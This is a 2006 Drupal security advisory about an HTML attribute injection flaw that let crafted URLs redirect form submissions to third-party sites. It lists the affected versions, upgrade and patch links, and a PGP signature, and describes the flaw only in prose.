[DRUPAL-SA-2006-026] Drupal 4.6.10 / 4.7.4 fixes HTML attribute injection issue

2006-10-21T00:00:00
ID SECURITYVULNS:DOC:14756
Type securityvulns
Reporter Securityvulns
Modified 2006-10-21T00:00:00

Description

------------------------------------------------------------------------

Drupal security advisory DRUPAL-SA-2006-026


Project: Drupal core Date: 2006-Oct-18 Security risk: Less critical Exploitable from: Remote Vulnerability: HTML attribute injection



Description

A malicious user may entice users to visit a specially crafted URL that may result in the redirection of Drupal form submission to a third-party site. A user visiting the user registration page via such a url, for example, will submit all data, such as his/her e-mail address, but also possible private profile data, to a third-party site.

Versions affected

  • Drupal 4.6.x versions before Drupal 4.6.10
  • Drupal 4.7.x versions before Drupal 4.7.4

Solution - If you are running Drupal 4.6.x then upgrade to Drupal 4.6.10. http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.6.10.tar.gz - If you are running Drupal 4.7.x then upgrade to Drupal 4.7.4. http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.7.4.tar.gz

  • To patch Drupal 4.6.9 use http://drupal.org/files/sa-2006-026/4.6.9.patch.
  • To patch Drupal 4.7.3 use http://drupal.org/files/sa-2006-026/4.7.3.patch.

Please note that the patches only contain changes related to this advisory, and do not fix bugs that were solved in 4.6.10 or 4.7.4.

Reported by

Frederic Marand.

Contact

The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact.

// Uwe Hermann, on behalf of the Drupal Security Team.

Uwe Hermann http://www.hermann-uwe.de http://www.it-services-uh.de | http://www.crazy-hacks.org http://www.holsham-traders.de | http://www.unmaintained-free-software.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFN7D2XdVoV3jWIbQRAn30AJ4wDXVgTcsZ6AVZU0iz8oFYqTx8dACeNXFj D4MxzZKaxPKknex3KMezI6Y= =eFVr -----END PGP SIGNATURE-----